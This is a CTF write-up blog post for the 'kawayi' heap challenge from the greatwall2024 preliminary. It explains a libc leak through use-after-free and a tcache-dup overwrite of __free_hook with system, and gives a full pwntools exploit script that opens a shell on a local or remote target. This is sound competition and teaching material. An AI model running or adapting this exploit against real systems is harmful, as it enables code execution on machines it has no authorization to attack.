greatwall2024 Preliminary - kawayi

RocketDev

File properties

Property   Value
Arch       x64
RELRO      Full
Canary     on
NX         on
PIE        on
strip      no
libc       2.27-3ubuntu1.6

Approach

A standard menu challenge. It allows requesting a 0x430-sized chunk, which lands in the unsorted bin on free, and it has both a double free and a UAF. The plan: free the unsorted-bin chunk and read it to leak libc (its fd points into main_arena), then use tcache dup to write system into __free_hook, and finally free a chunk holding b'/bin/sh\0' to get a shell.

EXPLOIT

```python
from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
GOLD_TEXT = lambda x: f'\x1b[33m{x}\x1b[0m'

def payload(lo: int):
    """lo bit 0: run the local binary (else connect to the remote); bit 1: attach gdb."""
    global sh, libc
    if lo:
        sh = process('./kawayi')
        if lo & 2:
            gdb.attach(sh)
    else:
        context.proxy = (socks.SOCKS5, '127.0.0.1', 1080)
        sh = remote('192.168.16.186', 8888)
    libc = ELF('./libc.so.6')

# Menu wrappers: 1 = add, 2 = delete, 3 = edit, 4 = show, 5 = exit
def addn(idx: int, size: int, cont: bytes, hooked: bool = False):
    sh.sendlineafter(b'exit', b'1')
    sh.sendlineafter(b'index', str(idx).encode())
    sh.sendlineafter(b'size', str(size).encode())
    sh.sendafter(b'talk', cont)

def edit(idx: int, cont: bytes):
    sh.sendlineafter(b'exit', b'3')
    sh.sendlineafter(b'index', str(idx).encode())
    sh.sendafter(b'write', cont)

def deln(idx: int):
    sh.sendlineafter(b'exit', b'2')
    sh.sendlineafter(b'index', str(idx).encode())

def show(idx: int) -> bytes:
    sh.sendlineafter(b'exit', b'4')
    sh.sendlineafter(b'index?\n\n', str(idx).encode())
    return sh.recvline()

def eout():
    sh.sendlineafter(b'exit', b'5')

payload(1)  # 1: local, 3: local with gdb attached, 0: remote

addn(0, 0x410, b' ')  # 0x420 chunk, above the tcache range, so it goes to the unsorted bin when freed
addn(1, 0x20, b' ')   # prevent chunk 0 being merged into top chunk
deln(0)
ret = show(0)         # UAF read: the freed chunk's fd points into main_arena

# main_arena lies 0x10 past __malloc_hook in this libc (__malloc_hook - __realloc_hook == 8)
dumpArena = libc.symbols['__malloc_hook'] + (libc.symbols['__malloc_hook'] - libc.symbols['__realloc_hook']) * 2
mainArena = u64(ret[:6] + b'\0\0') - 0x60  # sub unsorted bin offset
libcBase = mainArena - dumpArena
success(GOLD_TEXT(f'Leak libc: {hex(libcBase)}'))
freeHook = libcBase + libc.symbols['__free_hook']
system = libcBase + libc.symbols['system']

# tcache dup: each edit rewrites the freed chunk's next pointer to __free_hook
# and zeroes the second qword (the tcache key field)
deln(1)
edit(1, p64(freeHook) + p64(0))
deln(1)
edit(1, p64(freeHook) + p64(0))
addn(2, 0x20, p64(system))
addn(3, 0x20, p64(system))  # this allocation lands on __free_hook and writes system into it
# get shell
edit(1, b'/bin/sh\0')
deln(1)

sh.clean()
sh.interactive()
```

Submitted the flag in the final minute, what a thrill.

  • Title: greatwall2024 Preliminary - kawayi
  • Author: RocketDev
  • Created: 2024-03-31 21:53:00
  • Updated: 2024-07-25 12:34:56
  • Link: https://rocketmadev.github.io/2024/03/31/kawayi/
  • License: This article is licensed under CC BY-NC-SA 4.0.